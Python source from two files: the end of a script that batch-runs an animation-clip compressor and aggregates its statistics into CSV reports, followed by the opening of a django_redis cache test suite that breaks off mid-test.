options['stats'] = os.path.expanduser(options['stats'])
if value.startswith('-out='):
options['out'] = value[len('-out='):].replace('"', '')
options['out'] = os.path.expanduser(options['out'])
if value == '-csv_summary':
options['csv_summary'] = True
if value == '-csv_bit_rate':
options['csv_bit_rate'] = True
if value == '-csv_animated_size':
options['csv_animated_size'] = True
if value == '-csv_error':
options['csv_error'] = True
if value == '-refresh':
options['refresh'] = True
if value == '-no_progress_bar':
options['has_progress_bar'] = False
if value == '-stat_detailed':
options['stat_detailed'] = True
if value == '-stat_exhaustive':
options['stat_exhaustive'] = True
if value.startswith('-parallel='):
options['num_threads'] = int(value[len('-parallel='):].replace('"', ''))
if value.startswith('-level='):
options['level'] = value[len('-level='):].replace('"', '').capitalize()
if value == '-help':
options['print_help'] = True
if options['print_help']:
print_help()
sys.exit(1)
if len(options['acl']) == 0:
print('ACL input directory not found')
print_usage()
sys.exit(1)
if len(options['stats']) == 0:
print('Stat output directory not found')
print_usage()
sys.exit(1)
if options['num_threads'] <= 0:
print('-parallel switch argument must be greater than 0')
print_usage()
sys.exit(1)
if not os.path.exists(options['acl']) or not os.path.isdir(options['acl']):
print('ACL input directory not found: {}'.format(options['acl']))
print_usage()
sys.exit(1)
if not os.path.exists(options['stats']):
os.makedirs(options['stats'])
if not os.path.isdir(options['stats']):
print('The output stat argument must be a directory')
print_usage()
sys.exit(1)
return options
def print_usage():
print('Usage: python acl_compressor.py -acl=<path to directory containing ACL files> -stats=<path to output directory for stats> [-csv_summary] [-csv_bit_rate] [-csv_animated_size] [-csv_error] [-refresh] [-parallel={Num Threads}] [-help]')
def print_help():
print('Usage: python acl_compressor.py [arguments]')
print()
print('Arguments:')
print(' At least one argument must be provided.')
print(' -acl=<path>: Input directory tree containing clips to compress.')
print(' -stats=<path>: Output directory tree for the stats to output.')
print(' -out=<path>: Output directory tree for the compressed binaries to output.')
print(' -csv_summary: Generates a basic summary CSV file with various clip information and statistics.')
print(' -csv_bit_rate: Generates a CSV with the bit rate usage frequency by the variable quantization algorithm. The executable must be compiled with detailed statistics enabled.')
print(' -csv_animated_size: Generates a CSV with statistics about the animated size of key frames. The executable must be compiled with detailed statistics enabled.')
print(' -csv_error: Generates a CSV with the error for every bone at every key frame. The executable must be compiled with exhaustive statistics enabled.')
print(' -refresh: If an output stat file already exists for a particular clip, it is recompressed anyway instead of being skipped.')
print(' -parallel=<Num Threads>: Allows multiple clips to be compressed and processed in parallel.')
print(' -no_progress_bar: Suppresses the progress bar output')
print(' -stat_detailed: Enables detailed stat logging')
print(' -stat_exhaustive: Enables exhaustive stat logging')
print(' -help: Prints this help message.')
def print_stat(stat):
print('Algorithm: {}, Format: [{}], Ratio: {:.2f}, Error: {:.4f}'.format(stat['algorithm_name'], stat['desc'], stat['compression_ratio'], stat['max_error']))
print('')
def bytes_to_mb(size_in_bytes):
return size_in_bytes / (1024.0 * 1024.0)
def bytes_to_kb(size_in_bytes):
return size_in_bytes / 1024.0
def format_elapsed_time(elapsed_time):
hours, rem = divmod(elapsed_time, 3600)
minutes, seconds = divmod(rem, 60)
return '{:0>2}h {:0>2}m {:05.2f}s'.format(int(hours), int(minutes), seconds)
def sanitize_csv_entry(entry):
return entry.replace(', ', ' ').replace(',', '_')
def create_csv(options):
csv_data = {}
stat_dir = options['stats']
if options['csv_summary']:
stats_summary_csv_filename = os.path.join(stat_dir, 'stats_summary.csv')
stats_summary_csv_file = open(stats_summary_csv_filename, 'w')
csv_data['stats_summary_csv_file'] = stats_summary_csv_file
print('Generating CSV file {} ...'.format(stats_summary_csv_filename))
print('Clip Name, Algorithm Name, Raw Size, Compressed Size, Compression Ratio, Compression Time, Clip Duration, Num Animated Tracks, Max Error, Num Transforms, Num Samples Per Track, Quantization Memory Usage', file = stats_summary_csv_file)
if options['csv_bit_rate']:
stats_bit_rate_csv_filename = os.path.join(stat_dir, 'stats_bit_rate.csv')
stats_bit_rate_csv_file = open(stats_bit_rate_csv_filename, 'w')
csv_data['stats_bit_rate_csv_file'] = stats_bit_rate_csv_file
print('Generating CSV file {} ...'.format(stats_bit_rate_csv_filename))
print('Algorithm Name, 0, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 32', file = stats_bit_rate_csv_file)
if options['csv_animated_size']:
stats_animated_size_csv_filename = os.path.join(stat_dir, 'stats_animated_size.csv')
stats_animated_size_csv_file = open(stats_animated_size_csv_filename, 'w')
csv_data['stats_animated_size_csv_file'] = stats_animated_size_csv_file
print('Generating CSV file {} ...'.format(stats_animated_size_csv_filename))
print('Algorithm Name, Segment Index, Animated Size, Num Animated Tracks', file = stats_animated_size_csv_file)
if options['csv_error']:
stats_error_csv_filename = os.path.join(stat_dir, 'stats_error.csv')
stats_error_csv_file = open(stats_error_csv_filename, 'w')
csv_data['stats_error_csv_file'] = stats_error_csv_file
print('Generating CSV file {} ...'.format(stats_error_csv_filename))
print('Clip Name, Key Frame, Bone Index, Error', file = stats_error_csv_file)
return csv_data
def close_csv(csv_data):
if len(csv_data) == 0:
return
if 'stats_summary_csv_file' in csv_data:
csv_data['stats_summary_csv_file'].close()
if 'stats_bit_rate_csv_file' in csv_data:
csv_data['stats_bit_rate_csv_file'].close()
if 'stats_animated_size_csv_file' in csv_data:
csv_data['stats_animated_size_csv_file'].close()
if 'stats_error_csv_file' in csv_data:
csv_data['stats_error_csv_file'].close()
def append_csv(csv_data, job_data):
if 'stats_summary_csv_file' in csv_data:
data = job_data['stats_summary_data']
for (clip_name, algo_name, raw_size, compressed_size, compression_ratio, compression_time, duration, num_animated_tracks, max_error, num_transforms, num_samples_per_track, quantization_memory_usage) in data:
print('{}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}, {}'.format(clip_name, algo_name, raw_size, compressed_size, compression_ratio, compression_time, duration, num_animated_tracks, max_error, num_transforms, num_samples_per_track, quantization_memory_usage), file = csv_data['stats_summary_csv_file'])
if 'stats_animated_size_csv_file' in csv_data:
size_data = job_data['stats_animated_size']
for (name, segment_index, animated_size, num_animated) in size_data:
print('{}, {}, {}, {}'.format(name, segment_index, animated_size, num_animated), file = csv_data['stats_animated_size_csv_file'])
if 'stats_error_csv_file' in csv_data:
error_data = job_data['stats_error_data']
for (name, segment_index, data) in error_data:
key_frame = 0
for frame_errors in data:
bone_index = 0
for bone_error in frame_errors:
print('{}, {}, {}, {}'.format(name, key_frame, bone_index, bone_error), file = csv_data['stats_error_csv_file'])
bone_index += 1
key_frame += 1
def write_csv(csv_data, agg_data):
if 'stats_bit_rate_csv_file' in csv_data:
for algorithm_uid, algo_data in agg_data.items():
total_count = float(sum(algo_data['bit_rates']))
if total_count <= 0.0:
inv_total_count = 0.0 # Clamp to zero if a bit rate isn't used
else:
inv_total_count = 1.0 / total_count
print('{}, {}'.format(algo_data['csv_name'], ', '.join([str((float(x) * inv_total_count) * 100.0) for x in algo_data['bit_rates']])), file = csv_data['stats_bit_rate_csv_file'])
def print_progress(iteration, total, prefix='', suffix='', decimals = 1, bar_length = 40):
# Taken from https://stackoverflow.com/questions/3173320/text-progress-bar-in-the-console
# With minor tweaks
"""
Call in a loop to create terminal progress bar
@params:
iteration - Required : current iteration (Int)
total - Required : total iterations (Int)
prefix - Optional : prefix string (Str)
suffix - Optional : suffix string (Str)
decimals - Optional : positive number of decimals in percent complete (Int)
bar_length - Optional : character length of bar (Int)
"""
str_format = "{0:." + str(decimals) + "f}"
percents = str_format.format(100 * (iteration / float(total)))
filled_length = int(round(bar_length * iteration / float(total)))
bar = '█' * filled_length + '-' * (bar_length - filled_length)
# We need to clear any previous line we might have to ensure we have no visual artifacts
# Note that if this function is called too quickly, the text might flicker
terminal_width = 80
sys.stdout.write('{}\r'.format(' ' * terminal_width))
sys.stdout.flush()
sys.stdout.write('%s |%s| %s%s %s\r' % (prefix, bar, percents, '%', suffix)),
sys.stdout.flush()
if iteration == total:
sys.stdout.write('\n')
def run_acl_compressor(cmd_queue, result_queue):
while True:
entry = cmd_queue.get()
if entry is None:
return
(acl_filename, cmd) = entry
result = os.system(cmd)
if result != 0:
print('Failed to execute cmd: {}'.format(cmd))
result_queue.put(acl_filename)
def compress_clips(options):
acl_dir = options['acl']
stat_dir = options['stats']
if platform.system() == 'Windows':
stat_dir = '\\\\?\\{}'.format(stat_dir)
refresh = options['refresh']
if platform.system() == 'Windows':
compressor_exe_path = '../../build/bin/acl_compressor.exe'
else:
compressor_exe_path = '../../build/bin/acl_compressor'
compressor_exe_path = os.path.abspath(compressor_exe_path)
if not os.path.exists(compressor_exe_path):
print('Compressor exe not found: {}'.format(compressor_exe_path))
sys.exit(1)
stat_files = []
cmd_queue = queue.Queue()
out_dir = None
if len(options['out']) != 0:
if not os.path.exists(options['out']):
os.makedirs(options['out'])
if os.path.exists(options['out']) and os.path.isdir(options['out']):
out_dir = options['out']
for (dirpath, dirnames, filenames) in os.walk(acl_dir):
stat_dirname = dirpath.replace(acl_dir, stat_dir)
for filename in filenames:
if not filename.endswith('.acl.sjson'):
continue
acl_filename = os.path.join(dirpath, filename)
stat_filename = os.path.join(stat_dirname, filename.replace('.acl.sjson', '_stats.sjson'))
stat_files.append(stat_filename)
if os.path.exists(stat_filename) and os.path.isfile(stat_filename) and not refresh:
continue
if not os.path.exists(stat_dirname):
os.makedirs(stat_dirname)
stat_filename = stat_filename.replace('\\\\?\\', '')
cmd = '{} -acl="{}" -stats="{}" -level={}'.format(compressor_exe_path, acl_filename, stat_filename, options['level'])
if out_dir:
out_filename = os.path.join(options['out'], filename.replace('.acl.sjson', '.acl.bin'))
cmd = '{} -out="{}"'.format(cmd, out_filename)
if options['stat_detailed']:
cmd = '{} -stat_detailed'.format(cmd)
if options['stat_exhaustive']:
cmd = '{} -stat_exhaustive'.format(cmd)
if platform.system() == 'Windows':
cmd = cmd.replace('/', '\\')
cmd_queue.put((acl_filename, cmd))
if len(stat_files) == 0:
print("No ACL clips found to compress")
sys.exit(0)
if not cmd_queue.empty():
# Add a marker to terminate the threads
for i in range(options['num_threads']):
cmd_queue.put(None)
result_queue = queue.Queue()
compression_start_time = time.perf_counter()
threads = [ threading.Thread(target = run_acl_compressor, args = (cmd_queue, result_queue)) for _i in range(options['num_threads']) ]
for thread in threads:
thread.daemon = True
thread.start()
if options['has_progress_bar']:
print_progress(0, len(stat_files), 'Compressing clips:', '{} / {}'.format(0, len(stat_files)))
try:
while True:
for thread in threads:
thread.join(1.0)
num_processed = result_queue.qsize()
if options['has_progress_bar']:
print_progress(num_processed, len(stat_files), 'Compressing clips:', '{} / {}'.format(num_processed, len(stat_files)))
all_threads_done = True
for thread in threads:
if thread.isAlive():
all_threads_done = False
if all_threads_done:
break
except KeyboardInterrupt:
sys.exit(1)
compression_end_time = time.perf_counter()
print()
print('Compressed {} clips in {}'.format(len(stat_files), format_elapsed_time(compression_end_time - compression_start_time)))
return stat_files
def shorten_rotation_format(format):
if format == 'quatf_full':
return 'R:Quat'
elif format == 'quatf_drop_w_full':
return 'R:QuatNoW96'
elif format == 'QuatDropW_48':
return 'R:QuatNoW48'
elif format == 'QuatDropW_32':
return 'R:QuatNoW32'
elif format == 'quatf_drop_w_variable':
return 'R:QuatNoWVar'
else:
return 'R:???'
def shorten_translation_format(format):
if format == 'vector3f_full':
return 'T:Vec3_96'
elif format == 'Vector3_48':
return 'T:Vec3_48'
elif format == 'Vector3_32':
return 'T:Vec3_32'
elif format == 'vector3f_variable':
return 'T:Vec3Var'
else:
return 'T:???'
def shorten_scale_format(format):
if format == 'vector3f_full':
return 'S:Vec3_96'
elif format == 'Vector3_48':
return 'S:Vec3_48'
elif format == 'Vector3_32':
return 'S:Vec3_32'
elif format == 'vector3f_variable':
return 'S:Vec3Var'
else:
return 'S:???'
def aggregate_stats(agg_run_stats, run_stats):
algorithm_uid = run_stats['algorithm_uid']
if not algorithm_uid in agg_run_stats:
agg_data = {}
agg_data['name'] = run_stats['desc']
agg_data['csv_name'] = run_stats['csv_desc']
agg_data['total_raw_size'] = 0
agg_data['total_compressed_size'] = 0
agg_data['total_compression_time'] = 0.0
agg_data['total_duration'] = 0.0
agg_data['max_error'] = 0
agg_data['num_runs'] = 0
agg_data['bit_rates'] = [0] * 19
agg_run_stats[algorithm_uid] = agg_data
agg_data = agg_run_stats[algorithm_uid]
agg_data['total_raw_size'] += run_stats['raw_size']
agg_data['total_compressed_size'] += run_stats['compressed_size']
agg_data['total_compression_time'] += run_stats['compression_time']
agg_data['total_duration'] += run_stats['duration']
agg_data['max_error'] = max(agg_data['max_error'], run_stats['max_error'])
agg_data['num_runs'] += 1
if 'segments' in run_stats and len(run_stats['segments']) > 0:
for segment in run_stats['segments']:
if 'bit_rate_counts' in segment:
for i in range(19):
agg_data['bit_rates'][i] += segment['bit_rate_counts'][i]
def track_best_runs(best_runs, run_stats):
if run_stats['max_error'] < best_runs['best_error']:
best_runs['best_error'] = run_stats['max_error']
best_runs['best_error_entry'] = run_stats
if run_stats['compression_ratio'] > best_runs['best_ratio']:
best_runs['best_ratio'] = run_stats['compression_ratio']
best_runs['best_ratio_entry'] = run_stats
def track_worst_runs(worst_runs, run_stats):
if run_stats['max_error'] > worst_runs['worst_error']:
worst_runs['worst_error'] = run_stats['max_error']
worst_runs['worst_error_entry'] = run_stats
if run_stats['compression_ratio'] < worst_runs['worst_ratio']:
worst_runs['worst_ratio'] = run_stats['compression_ratio']
worst_runs['worst_ratio_entry'] = run_stats
def run_stat_parsing(options, stat_queue, result_queue):
#signal.signal(signal.SIGINT, signal.SIG_IGN)
try:
agg_run_stats = {}
best_runs = {}
best_runs['best_error'] = 100000000.0
best_runs['best_error_entry'] = None
best_runs['best_ratio'] = 0.0
best_runs['best_ratio_entry'] = None
worst_runs = {}
worst_runs['worst_error'] = -100000000.0
worst_runs['worst_error_entry'] = None
worst_runs['worst_ratio'] = 100000000.0
worst_runs['worst_ratio_entry'] = None
num_runs = 0
total_compression_time = 0.0
stats_summary_data = []
stats_error_data = []
stats_animated_size = []
bone_error_values = []
compression_times = []
while True:
stat_filename = stat_queue.get()
if stat_filename is None:
break
with open(stat_filename, 'r') as file:
try:
file_data = sjson.loads(file.read())
runs = file_data['runs']
for run_stats in runs:
if len(run_stats) == 0:
continue
run_stats['filename'] = stat_filename.replace('\\\\?\\', '')
run_stats['clip_name'] = os.path.splitext(os.path.basename(stat_filename))[0]
run_stats['rotation_format'] = shorten_rotation_format(run_stats['rotation_format'])
run_stats['translation_format'] = shorten_translation_format(run_stats['translation_format'])
run_stats['scale_format'] = shorten_scale_format(run_stats['scale_format'])
if isinstance(run_stats['duration'], str):
run_stats['duration'] = 0.0
if 'segmenting' in run_stats:
run_stats['desc'] = '{}|{}|{}'.format(run_stats['rotation_format'], run_stats['translation_format'], run_stats['scale_format'])
run_stats['csv_desc'] = '{}|{}|{}'.format(run_stats['rotation_format'], run_stats['translation_format'], run_stats['scale_format'])
else:
run_stats['desc'] = '{}|{}|{}'.format(run_stats['rotation_format'], run_stats['translation_format'], run_stats['scale_format'])
run_stats['csv_desc'] = '{}|{}|{}'.format(run_stats['rotation_format'], run_stats['translation_format'], run_stats['scale_format'])
aggregate_stats(agg_run_stats, run_stats)
track_best_runs(best_runs, run_stats)
track_worst_runs(worst_runs, run_stats)
num_runs += 1
total_compression_time += run_stats['compression_time']
compression_times.append(run_stats['compression_time'])
if options['csv_summary']:
#(name, raw_size, compressed_size, compression_ratio, compression_time, duration, num_animated_tracks, max_error, num_transforms, num_samples_per_track, quantization_memory_usage)
num_transforms = run_stats['num_bones']
num_samples_per_track = run_stats['num_samples']
num_animated_tracks = run_stats.get('num_animated_tracks', 0)
quantization_memory_usage = run_stats.get('track_bit_rate_database_size', 0) + run_stats.get('transform_cache_size', 0)
data = (run_stats['clip_name'], run_stats['csv_desc'], run_stats['raw_size'], run_stats['compressed_size'], run_stats['compression_ratio'], run_stats['compression_time'], run_stats['duration'], num_animated_tracks, run_stats['max_error'], num_transforms, num_samples_per_track, quantization_memory_usage)
stats_summary_data.append(data)
if 'segments' in run_stats and len(run_stats['segments']) > 0:
segment_index = 0
for segment in run_stats['segments']:
if 'animated_frame_size' in segment and options['csv_animated_size']:
stats_animated_size.append((run_stats['clip_name'], segment_index, segment['animated_frame_size'], run_stats['num_animated_tracks']))
if 'error_per_frame_and_bone' in segment and len(segment['error_per_frame_and_bone']) > 0:
# Convert to array, lower memory footprint and more efficient
if options['csv_error']:
#(name, segment_index, data)
data = (run_stats['clip_name'], segment_index, segment['error_per_frame_and_bone'])
stats_error_data.append(data)
for frame_error_values in segment['error_per_frame_and_bone']:
bone_error_values.extend([float(v) for v in frame_error_values])
# Data isn't needed anymore, discard it
segment['error_per_frame_and_bone'] = []
segment_index += 1
result_queue.put(('progress', stat_filename))
except sjson.ParseException:
print('Failed to parse SJSON file: {}'.format(stat_filename))
# Done
results = {}
results['agg_run_stats'] = agg_run_stats
results['best_runs'] = best_runs
results['worst_runs'] = worst_runs
results['num_runs'] = num_runs
results['total_compression_time'] = total_compression_time
results['stats_summary_data'] = stats_summary_data
results['stats_error_data'] = stats_error_data
results['stats_animated_size'] = stats_animated_size
results['bone_error_values'] = bone_error_values
results['compression_times'] = compression_times
result_queue.put(('done', results))
except KeyboardInterrupt:
print('Interrupted')
def pretty_print(d, indent = 0):
for key, value in d.items():
if isinstance(value, dict):
print('\t' * indent + str(key))
pretty(value, indent + 1)
else:
print('\t' * indent + str(key) + ': ' + str(value))
def aggregate_job_stats(agg_job_results, job_results):
if job_results['num_runs'] == 0:
return
if len(agg_job_results) == 0:
# Convert array to numpy array
job_results['bone_error_values'] = numpy.array(job_results['bone_error_values'])
job_results['compression_times'] = numpy.array(job_results['compression_times'])
agg_job_results.update(job_results)
else:
agg_job_results['num_runs'] += job_results['num_runs']
agg_job_results['total_compression_time'] += job_results['total_compression_time']
for key in job_results['agg_run_stats'].keys():
if not key in agg_job_results['agg_run_stats']:
agg_job_results['agg_run_stats'][key] = job_results['agg_run_stats'][key].copy()
else:
agg_job_results['agg_run_stats'][key]['total_raw_size'] += job_results['agg_run_stats'][key]['total_raw_size']
agg_job_results['agg_run_stats'][key]['total_compressed_size'] += job_results['agg_run_stats'][key]['total_compressed_size']
agg_job_results['agg_run_stats'][key]['total_compression_time'] += job_results['agg_run_stats'][key]['total_compression_time']
agg_job_results['agg_run_stats'][key]['total_duration'] += job_results['agg_run_stats'][key]['total_duration']
agg_job_results['agg_run_stats'][key]['max_error'] = max(agg_job_results['agg_run_stats'][key]['max_error'], job_results['agg_run_stats'][key]['max_error'])
agg_job_results['agg_run_stats'][key]['num_runs'] += job_results['agg_run_stats'][key]['num_runs']
for i in range(19):
agg_job_results['agg_run_stats'][key]['bit_rates'][i] += job_results['agg_run_stats'][key]['bit_rates'][i]
if job_results['best_runs']['best_error'] < agg_job_results['best_runs']['best_error']:
agg_job_results['best_runs']['best_error'] = job_results['best_runs']['best_error']
agg_job_results['best_runs']['best_error_entry'] = job_results['best_runs']['best_error_entry']
if job_results['best_runs']['best_ratio'] > agg_job_results['best_runs']['best_ratio']:
agg_job_results['best_runs']['best_ratio'] = job_results['best_runs']['best_ratio']
agg_job_results['best_runs']['best_ratio_entry'] = job_results['best_runs']['best_ratio_entry']
if job_results['worst_runs']['worst_error'] > agg_job_results['worst_runs']['worst_error']:
agg_job_results['worst_runs']['worst_error'] = job_results['worst_runs']['worst_error']
agg_job_results['worst_runs']['worst_error_entry'] = job_results['worst_runs']['worst_error_entry']
if job_results['worst_runs']['worst_ratio'] < agg_job_results['worst_runs']['worst_ratio']:
agg_job_results['worst_runs']['worst_ratio'] = job_results['worst_runs']['worst_ratio']
agg_job_results['worst_runs']['worst_ratio_entry'] = job_results['worst_runs']['worst_ratio_entry']
agg_job_results['bone_error_values'] = numpy.append(agg_job_results['bone_error_values'], job_results['bone_error_values'])
agg_job_results['compression_times'] = numpy.append(agg_job_results['compression_times'], job_results['compression_times'])
def percentile_rank(values, value):
return (values < value).mean() * 100.0
if __name__ == "__main__":
if sys.version_info < (3, 4):
print('Python 3.4 or higher needed to run this script')
sys.exit(1)
options = parse_argv()
stat_files = compress_clips(options)
csv_data = create_csv(options)
aggregating_start_time = time.perf_counter()
stat_queue = multiprocessing.Queue()
for stat_filename in stat_files:
stat_queue.put(stat_filename)
# Add a marker to terminate the jobs
for i in range(options['num_threads']):
stat_queue.put(None)
result_queue = multiprocessing.Queue()
jobs = [ multiprocessing.Process(target = run_stat_parsing, args = (options, stat_queue, result_queue)) for _i in range(options['num_threads']) ]
for job in jobs:
job.start()
agg_job_results = {}
num_stat_file_processed = 0
if options['has_progress_bar']:
print_progress(num_stat_file_processed, len(stat_files), 'Aggregating results:', '{} / {}'.format(num_stat_file_processed, len(stat_files)))
try:
while True:
try:
(msg, data) = result_queue.get(True, 1.0)
if msg == 'progress':
num_stat_file_processed += 1
if options['has_progress_bar']:
print_progress(num_stat_file_processed, len(stat_files), 'Aggregating results:', '{} / {}'.format(num_stat_file_processed, len(stat_files)))
elif msg == 'done':
aggregate_job_stats(agg_job_results, data)
append_csv(csv_data, data)
except queue.Empty:
all_jobs_done = True
for job in jobs:
if job.is_alive():
all_jobs_done = False
if all_jobs_done:
break
except KeyboardInterrupt:
sys.exit(1)
agg_run_stats = agg_job_results['agg_run_stats']
best_runs = agg_job_results['best_runs']
worst_runs = agg_job_results['worst_runs']
num_runs = agg_job_results['num_runs']
write_csv(csv_data, agg_run_stats)
aggregating_end_time = time.perf_counter()
print()
print('Found {} runs in {}'.format(num_runs, format_elapsed_time(aggregating_end_time - aggregating_start_time)))
print()
close_csv(csv_data)
print('Stats per run type:')
run_types_by_size = sorted(agg_run_stats.values(), key = lambda entry: entry['total_compressed_size'])
for run_stats in run_types_by_size:
ratio = float(run_stats['total_raw_size']) / float(run_stats['total_compressed_size'])
print('Compressed {:.2f} MB, Elapsed {}, Ratio [{:.2f} : 1], Max error [{:.4f}] Run type: {}'.format(bytes_to_mb(run_stats['total_compressed_size']), format_elapsed_time(run_stats['total_compression_time']), ratio, run_stats['max_error'], run_stats['name']))
print()
print('Total:')
total_raw_size = sum([x['total_raw_size'] for x in agg_run_stats.values()])
total_compressed_size = sum([x['total_compressed_size'] for x in agg_run_stats.values()])
total_compression_time = sum([x['total_compression_time'] for x in agg_run_stats.values()])
total_max_error = max([x['max_error'] for x in agg_run_stats.values()])
total_ratio = float(total_raw_size) / float(total_compressed_size)
print('Compressed {:.2f} MB, Elapsed {}, Ratio [{:.2f} : 1], Max error [{:.4f}]'.format(bytes_to_mb(total_compressed_size), format_elapsed_time(total_compression_time), total_ratio, total_max_error))
print()
total_duration = sum([x['total_duration'] for x in agg_run_stats.values()])
print('Sum of clip durations: {}'.format(format_elapsed_time(total_duration)))
print('Total compression time: {} ({:.3f} seconds)'.format(format_elapsed_time(total_compression_time), total_compression_time))
print('Total raw size: {:.2f} MB'.format(bytes_to_mb(total_raw_size)))
print('Compression speed: {:.2f} KB/sec'.format(bytes_to_kb(total_raw_size) / total_compression_time))
print('Compression time 50, 85, 99th percentile: {:.3f}, {:.3f}, {:.3f} seconds'.format(numpy.percentile(agg_job_results['compression_times'], 50.0), numpy.percentile(agg_job_results['compression_times'], 85.0), numpy.percentile(agg_job_results['compression_times'], 99.0)))
if len(agg_job_results['bone_error_values']) > 0:
print('Bone error 99th percentile: {:.4f}'.format(numpy.percentile(agg_job_results['bone_error_values'], 99.0)))
print('Error threshold percentile rank: {:.2f} (0.01)'.format(percentile_rank(agg_job_results['bone_error_values'], 0.01)))
print()
print('Most accurate: {}'.format(best_runs['best_error_entry']['filename']))
print_stat(best_runs['best_error_entry'])
print('Best ratio: {}'.format(best_runs['best_ratio_entry']['filename']))
print_stat(best_runs['best_ratio_entry'])
print('Least accurate: {}'.format(worst_runs['worst_error_entry']['filename']))
print_stat(worst_runs['worst_error_entry'])
print('Worst ratio: {}'.format(worst_runs['worst_ratio_entry']['filename']))
print_stat(worst_runs['worst_ratio_entry'])
|
test_backend.py
|
import base64
import copy
import datetime
import threading
import time
import unittest
from datetime import timedelta
from unittest.mock import Mock, patch
from django import VERSION
from django.conf import settings
from django.contrib.sessions.backends.cache import SessionStore as CacheSession
from django.core.cache import DEFAULT_CACHE_ALIAS, cache, caches
from django.test import override_settings
from django.utils import timezone
from redis.exceptions import ConnectionError
import django_redis.cache
from django_redis import pool
from django_redis.client import DefaultClient, ShardClient, herd
from django_redis.serializers.json import JSONSerializer
from django_redis.serializers.msgpack import MSGPackSerializer
herd.CACHE_HERD_TIMEOUT = 2
def make_key(key, prefix, version):
return "{}#{}#{}".format(prefix, version, key)
def reverse_key(key):
return key.split("#", 2)[2]
class DjangoRedisConnectionStrings(unittest.TestCase):
def setUp(self):
self.cf = pool.get_connection_factory(options={})
self.constring4 = "unix://tmp/foo.bar?db=1"
self.constring5 = "redis://localhost/2"
self.constring6 = "rediss://localhost:3333?db=2"
def test_new_connection_strings(self):
res1 = self.cf.make_connection_params(self.constring4)
res2 = self.cf.make_connection_params(self.constring5)
res3 = self.cf.make_connection_params(self.constring6)
self.assertEqual(res1["url"], self.constring4)
self.assertEqual(res2["url"], self.constring5)
self.assertEqual(res3["url"], self.constring6)
class DjangoRedisCacheTestEscapePrefix(unittest.TestCase):
def setUp(self):
caches_setting = copy.deepcopy(settings.CACHES)
caches_setting["default"]["KEY_PREFIX"] = "*"
cm = override_settings(CACHES=caches_setting)
cm.enable()
self.addCleanup(cm.disable)
self.cache = caches["default"]
try:
self.cache.clear()
except Exception:
pass
self.other = caches["with_prefix"]
try:
self.other.clear()
except Exception:
pass
def test_delete_pattern(self):
self.cache.set("a", "1")
self.other.set("b", "2")
self.cache.delete_pattern("*")
self.assertIs(self.cache.has_key("a"), False)
self.assertEqual(self.other.get("b"), "2")
def test_iter_keys(self):
if isinstance(self.cache.client, ShardClient):
self.skipTest("ShardClient doesn't support iter_keys")
self.cache.set("a", "1")
self.other.set("b", "2")
self.assertEqual(list(self.cache.iter_keys("*")), ["a"])
def test_keys(self):
self.cache.set("a", "1")
self.other.set("b", "2")
keys = self.cache.keys("*")
self.assertIn("a", keys)
self.assertNotIn("b", keys)
class DjangoRedisCacheTestCustomKeyFunction(unittest.TestCase):
def setUp(self):
caches_setting = copy.deepcopy(settings.CACHES)
caches_setting["default"]["KEY_FUNCTION"] = "test_backend.make_key"
caches_setting["default"]["REVERSE_KEY_FUNCTION"] = "test_backend.reverse_key"
cm = override_settings(CACHES=caches_setting)
cm.enable()
self.addCleanup(cm.disable)
self.cache = caches["default"]
try:
self.cache.clear()
except Exception:
pass
def test_custom_key_function(self):
if isinstance(self.cache.client, ShardClient):
self.skipTest("ShardClient doesn't support get_client")
for key in ["foo-aa", "foo-ab", "foo-bb", "foo-bc"]:
self.cache.set(key, "foo")
res = self.cache.delete_pattern("*foo-a*")
self.assertTrue(bool(res))
keys = self.cache.keys("foo*")
self.assertEqual(set(keys), {"foo-bb", "foo-bc"})
# ensure our custom function was actually called
self.assertEqual(
{k.decode() for k in self.cache.client.get_client(write=False).keys("*")},
{"#1#foo-bc", "#1#foo-bb"},
)
class DjangoRedisCacheTests(unittest.TestCase):
def setUp(self):
self.cache = cache
try:
self.cache.clear()
except Exception:
pass
def test_setnx(self):
# we should ensure there is no test_key_nx in redis
self.cache.delete("test_key_nx")
res = self.cache.get("test_key_nx")
self.assertIsNone(res)
res = self.cache.set("test_key_nx", 1, nx=True)
self.assertTrue(res)
# test that second set will have
res = self.cache.set("test_key_nx", 2, nx=True)
self.assertFalse(res)
res = self.cache.get("test_key_nx")
self.assertEqual(res, 1)
self.cache.delete("test_key_nx")
res = self.cache.get("test_key_nx")
self.assertIsNone(res)
def test_setnx_timeout(self):
# test that timeout still works for nx=True
res = self.cache.set("test_key_nx", 1, timeout=2, nx=True)
self.assertTrue(res)
time.sleep(3)
res = self.cache.get("test_key_nx")
self.assertIsNone(res)
# test that timeout will not affect key, if it was there
self.cache.set("test_key_nx", 1)
res = self.cache.set("test_key_nx", 2, timeout=2, nx=True)
self.assertFalse(res)
time.sleep(3)
res = self.cache.get("test_key_nx")
self.assertEqual(res, 1)
self.cache.delete("test_key_nx")
res = self.cache.get("test_key_nx")
self.assertIsNone(res)
def test_unicode_keys(self):
self.cache.set("ключ", "value")
res = self.cache.get("ключ")
self.assertEqual(res, "value")
def test_save_and_integer(self):
self.cache.set("test_key", 2)
res = self.cache.get("test_key", "Foo")
self.assertIsInstance(res, int)
self.assertEqual(res, 2)
def test_save_string(self):
self.cache.set("test_key", "hello" * 1000)
res = self.cache.get("test_key")
self.assertIsInstance(res, str)
self.assertEqual(res, "hello" * 1000)
self.cache.set("test_key", "2")
res = self.cache.get("test_key")
self.assertIsInstance(res, str)
self.assertEqual(res, "2")
def test_save_unicode(self):
self.cache.set("test_key", "heló")
res = self.cache.get("test_key")
self.assertIsInstance(res, str)
self.assertEqual(res, "heló")
def test_save_dict(self):
if isinstance(
self.cache.client._serializer, (JSONSerializer, MSGPackSerializer)
):
# JSONSerializer and MSGPackSerializer use the isoformat for
# datetimes.
now_dt = datetime.datetime.now().isoformat()
else:
now_dt = datetime.datetime.now()
test_dict = {"id": 1, "date": now_dt, "name": "Foo"}
self.cache.set("test_key", test_dict)
res = self.cache.get("test_key")
self.assertIsInstance(res, dict)
self.assertEqual(res["id"], 1)
self.assertEqual(res["name"], "Foo")
self.assertEqual(res["date"], now_dt)
def test_save_float(self):
float_val = 1.345620002
self.cache.set("test_key", float_val)
res = self.cache.get("test_key")
self.assertIsInstance(res, float)
self.assertEqual(res, float_val)
def test_timeout(self):
self.cache.set("test_key", 222, timeout=3)
time.sleep(4)
res = self.cache.get("test_key")
self.assertIsNone(res)
def test_timeout_0(self):
self.cache.set("test_key", 222, timeout=0)
